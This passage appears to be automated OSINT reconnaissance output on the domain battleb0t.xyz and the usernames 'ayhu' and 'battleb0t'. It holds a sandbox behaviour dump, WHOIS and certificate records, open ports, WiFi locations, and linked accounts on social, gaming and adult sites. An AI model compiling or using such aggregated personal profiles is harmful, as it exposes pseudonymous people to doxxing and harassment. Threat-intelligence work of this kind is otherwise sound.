"msedge.exe" loaded module "NTDLL.DLL" at base cd1f0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"19001a00ce01000040c7a2c9fc7f0000@ntdll.dll"\n "22002300ce01000018c7a2c9fc7f0000@ntdll.dll"\n "19001a00a204000040c7a2c9fc7f0000@ntdll.dll"\n "22002300a204000018c7a2c9fc7f0000@ntdll.dll"\n "19001a00dbad000040c7a2c9fc7f0000@ntdll.dll"\n "22002300dbad000018c7a2c9fc7f0000@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:7376:120:WilError_01"\n "Local\\SM0:4708:304:WilStaging_02"\n "Local\\SM0:4708:120:WilError_01"\n "SM0:4708:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:7376:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:7376:304:WilStaging_02"\n "Local\\SM0:7376:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7376:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7376:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7376:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"185.199.111.153:443"\n "172.66.43.150:443"\n "185.88.152.184:443"\n "35.186.254.174:443"\n "104.18.10.207:443"\n "142.251.46.228:443"\n "172.67.71.45:443"\n "142.251.32.35:443"\n "142.250.191.35:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-161', u'name': u'Contains ability to modify processes thread functionality (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"OpenThread" [Source: 00000000-00004708.00000000.77705.CAEDF000.00000002.mdmp]'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00004708"\n YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\Extension State\\000003.log]- [targetUID: 00000000-00007376]\n "04a02e02-c03b-426d-8be8-484f86bfe2ba.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\04a02e02-c03b-426d-8be8-484f86bfe2ba.tmp]- [targetUID: 00000000-00001136]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007376]\n "typosquatting_list.pb" has type "data"- Location: [%TEMP%\\7376_302125849\\typosquatting_list.pb]- [targetUID: 00000000-00007376]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\7376_1093145157\\Filtering Rules]- [targetUID: 00000000-00007376]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007376]\n "f_00023d" has type "gzip compressed data max compression original size modulo 2^32 413534"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00001136]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\7376_302125849\\_metadata\\verified_contents.json]- [targetUID: 00000000-00007376]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Kids Mode\\0.0.0.10\\manifest.fingerprint]- [targetUID: 00000000-00007376]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7376_780837103\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007376]\n "ee112835-328c-4e32-a5d4-fb2715bea0bc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\ee112835-328c-4e32-a5d4-fb2715bea0bc.tmp]- [targetUID: 00000000-00007376]\n "Session_13322616210952279" has type "data"- [targetUID: N/A]\n "61b14bdf-c2ee-416d-b78e-d3d4b4a06383.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\61b14bdf-c2ee-416d-b78e-d3d4b4a06383.tmp]- [targetUID: 00000000-00007376]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007376]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7376_780837103\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007376]\n "f34135bd94e6cca1_0" has type "data"- [targetUID: N/A]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\7376_780837103\\shopping_fre.html]- [targetUID: 00000000-00007376]\n "9be37f3e-709d-4866-b8f9-622ffd41feca.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\9be37f3e-709d-4866-b8f9-622ffd41feca.tmp]- [targetUID: 00000000-00007376]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7376_780837103\\edge_driver.js]- [targetUID: 00000000-00007376]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007376]'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-4', u'name': u'Found a string that may be used as part of an injection method', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1055/011', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1055.011', u'relevance': 4, u'threat_level': 0, u'type': 2, 
u'description': u'"Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-184', u'name': u'Found registry location strings which can modifies auto-execute functionality', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1547/001', u'threat_level_human': u'informative', u' | 185.199.111.153 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.41): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | fanpop (Category: social)
https://www.fanpop.com/fans/ayhu | ayhu |
| 2023-05-12 02:45:41 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | San Francisco (South Beach), California, 94107, United States, North America | 185.199.110.153 |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | registrar-abuse@google.com | Domain Name: AHU.XYZ
Registry Domain ID: D196165314-CNIC
Registrar WHOIS Server: whois.google.com
Registrar URL: https://domains.google.com
Updated Date: 2023-05-04T03:02:40.0Z
Creation Date: 2020-08-10T01:10:12.0Z
Registry Expiry Date: 2026-08-10T23:59:59.0Z
Registrar: Google Inc
Registrar IANA ID: 895
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Contact Privacy Inc. Customer 7151571251
Registrant State/Province: ON
Registrant Country: CA
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: registrar-abuse@google.com
Registrar Abuse Contact Phone: +1.2065311374
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ahu.xyz
Registry Domain ID: D196165314-CNIC
Registrar WHOIS Server: whois.google.com
Registrar URL: https://domains.google.com
Updated Date: 2023-05-04T03:02:40Z
Creation Date: 2020-08-10T01:10:12Z
Registrar Registration Expiration Date: 2026-08-10T23:59:59Z
Registrar: Google LLC
Registrar IANA ID: 895
Registrar Abuse Contact Email: registrar-abuse@google.com
Registrar Abuse Contact Phone: +1.8772376466
Domain Status: serverTransferProhibited https://www.icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: go663216313251
Registrant Name: Contact Privacy Inc. Customer 7151571251
Registrant Organization: Contact Privacy Inc. Customer 7151571251
Registrant Street: 96 Mowat Ave
Registrant City: Toronto
Registrant State/Province: ON
Registrant Postal Code: M4K 3K1
Registrant Country: CA
Registrant Phone: +1.4165385487
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Registry Admin ID: go663216313251
Admin Name: Contact Privacy Inc. Customer 7151571251
Admin Organization: Contact Privacy Inc. Customer 7151571251
Admin Street: 96 Mowat Ave
Admin City: Toronto
Admin State/Province: ON
Admin Postal Code: M4K 3K1
Admin Country: CA
Admin Phone: +1.4165385487
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Registry Tech ID: go663216313251
Tech Name: Contact Privacy Inc. Customer 7151571251
Tech Organization: Contact Privacy Inc. Customer 7151571251
Tech Street: 96 Mowat Ave
Tech City: Toronto
Tech State/Province: ON
Tech Postal Code: M4K 3K1
Tech Country: CA
Tech Phone: +1.4165385487
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: https://domains.google.com/contactregistrant?domain=ahu.xyz
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:16:36.418919Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
Please register your domains at: https://domains.google.com/
This data is provided by Google for information purposes, and to assist
persons obtaining information about or related to domain name registration
records. Google does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data only for
lawful purposes and that, under no circumstances, will you use this data to:
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail (spam); or
2) enable high volume, automated, electronic processes that apply to this
WHOIS server.
These terms may be changed without prior notice.
By submitting this query, you agree to abide by this policy.
|
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.14): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.34): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:26 | Username | No | Social Network Identifier | 172 | 0 | 5 | 0 | None | login | https://github.com/login/oauth/authorize?client_id=42db428b279076117521&redirect_uri=https://qolhub.cloudflareaccess.com/cdn-cgi/access/callback&response_type=code&scope=user:email,read:org&state=9995ee075e82e86ee47e714d846227dc35b4772134e51bd1627e17e1594cf0fa.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%3D |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WIN-MAKCI77HADK 1028 (Net ID: 38:1D:D9:1B:3E:B3) | 37.751, -97.822 |
| 2023-05-12 02:47:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 104.196.30.220:80 | 104.196.30.220 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551551399 (Net ID: 00:01:E3:55:13:99) | 52.3759, 4.8975 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ebrahemsamir.github.io | 185.199.110.153 |
| 2023-05-12 02:54:22 | Linked URL - External | No | Web Spider | 3 | 0 | 3 | 0 | None | https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=%2F&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.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.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg | panel.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ELSA (Net ID: 00:02:2D:27:BC:4F) | 50.1188, 8.6843 |
| 2023-05-12 02:46:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:04:02:53:52:8b:ff:fb:8a:0a:11:44:e7:ab:f5:69:c5:9e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:33:43 2023 GMT
Not After : Apr 14 17:33:42 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:56:66:b3:c8:a2:23:b1:5a:3f:a8:f8:12:86:96:
e9:2c:15:d7:f2:10:34:11:7a:db:91:0d:f0:b3:57:
f5:24:8b:d6:33:b2:e0:da:47:1e:c3:4b:59:19:6f:
0a:27:ae:26:29:f9:b7:07:60:5c:49:2f:47:35:2a:
5c:c8:f0:96:d7
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3C:85:65:2A:BA:2A:04:2A:54:22:30:3E:E5:23:B1:1E:15:C3:96:05
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8e:ad:47:f4:d5:0c:35:7b:16:d0:9b:94:a8:b1:26:20:fb:
c5:de:a5:93:db:57:19:e0:12:90:43:82:bc:d6:2f:43:eb:2e:
4c:de:6a:4e:5a:f7:3a:69:b4:d3:79:d5:3c:fc:10:95:09:06:
01:1c:46:7d:6d:7c:be:7f:a8:01:e3:93:44:8e:bd:bd:0d:b0:
bd:c9:0f:53:30:c3:5b:43:1c:de:0d:db:29:b4:9c:76:9a:cb:
51:4b:06:1b:20:dd:ec:e9:a2:bf:56:76:bf:92:0c:eb:70:70:
9b:b4:4a:4f:2d:37:e0:34:a0:a3:ff:13:86:8a:79:7e:16:1e:
8e:c6:82:ca:0f:96:f3:8a:2f:c4:0b:aa:a8:ac:55:f4:88:40:
e0:16:cf:a7:dc:c0:30:00:8e:a5:37:c8:bd:86:e7:c9:7f:a2:
43:a8:8f:4d:72:0e:2a:78:36:4d:70:de:f4:63:fb:7a:69:dd:
eb:ae:02:25:ec:2e:30:97:68:f6:5a:d7:e8:b6:58:95:b6:c1:
cc:b3:c2:25:09:9a:c8:a4:d7:3d:29:63:7c:34:a0:fc:c2:d0:
5c:94:37:dd:b4:c4:b6:03:3f:3d:50:00:5d:5e:7b:c9:e9:6b:
3d:db:2e:3d:c8:b1:34:d0:37:5f:80:1d:38:7f:1c:95:f3:da:
c4:21:7d:17
|
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=ayhu | ayhu |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | PureFTPd Pure-FTPd | 87.248.157.102 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2096 | 104.21.71.14 |
| 2023-05-12 03:32:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.4:443 | 188.114.97.0/24 |
| 2023-05-12 02:44:09 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 1 | 0 | None | *.github.io, github.io, *.github.com, github.com, www.github.com, *.githubusercontent.com, githubusercontent.com | battleb0t.xyz |
| 2023-05-12 03:32:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.20:8080 | 188.114.97.0/24 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | giters (Category: coding)
https://giters.com/battleb0t | battleb0t |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 7637 0253 (Net ID: 00:1C:FB:F9:EC:50) | 32.8608, -79.9746 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c546dd3883829f4-ORD"]} | 188.114.97.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GWF (Net ID: 00:06:25:06:28:35) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:49 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | 35.229.48.116 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | xHamster (Category: XXXPORNXXX)
https://xhamster.com/users/ayhu | ayhu |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Airliners (Category: social)
https://www.airliners.net/user/login/profile | login |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.54): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:47:32 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 172.67.135.9:443 | 172.67.135.9 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/battleb0t | battleb0t |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WLAN (Net ID: 00:02:44:AF:55:CE) | 50.1188, 8.6843 |
| 2023-05-12 03:17:44 | Username | No | Account Finder | 58 | 0 | 1 | 0 | None | ayhu | ayhu.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LF-X1U.00014A10EF0C (Net ID: 00:01:4A:10:EF:0C) | 37.7813933,-122.3918002 |
| 2023-05-12 02:53:25 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 2606:4700:3030::ac43:a8fc | www.battleb0t.xyz |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.146): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:53:56 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8d-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 8F4E:438C:28D6A76:39C4C57:645DA4A1
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100090-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683858593.452046,VS0,VE24
Vary: Accept-Encoding
X-Fastly-Request-ID: bf30db8298ebcbd37ba35a7187f0fd669e8117db
| 2606:50c0:8001::153 |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | pics.battleb0t.xyz | [{"url": "https://pics.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5221619826367a-FRA
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | dragontears (Net ID: 00:0C:F6:42:E6:42) | 50.8897, 6.0563 |
| 2023-05-12 02:44:36 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:34:48:36:b2:51:77:1f:45:f7:ca:23:53:09:6b:f8:20:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:18 2022 GMT
Not After : Mar 27 01:46:17 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
73:BD:0E:B3:ED:9F:6A:FE:37:97:44:54:03:BB:B6:CC:83:95:C8:48
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SX551C65D72 (Net ID: 00:01:E3:C6:5D:72) | 50.8897, 6.0563 |
| 2023-05-12 03:32:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.17:443 | 188.114.97.0/24 |
| 2023-05-12 03:24:22 | HTTP Headers | No | Web Spider | 1 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 03:24:22 GMT", "content-type": "text/html"} | https://kekw.battleb0t.xyz/jar |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ee2a62d9a2306-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 03:32:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.14:8080 | 188.114.97.0/24 |
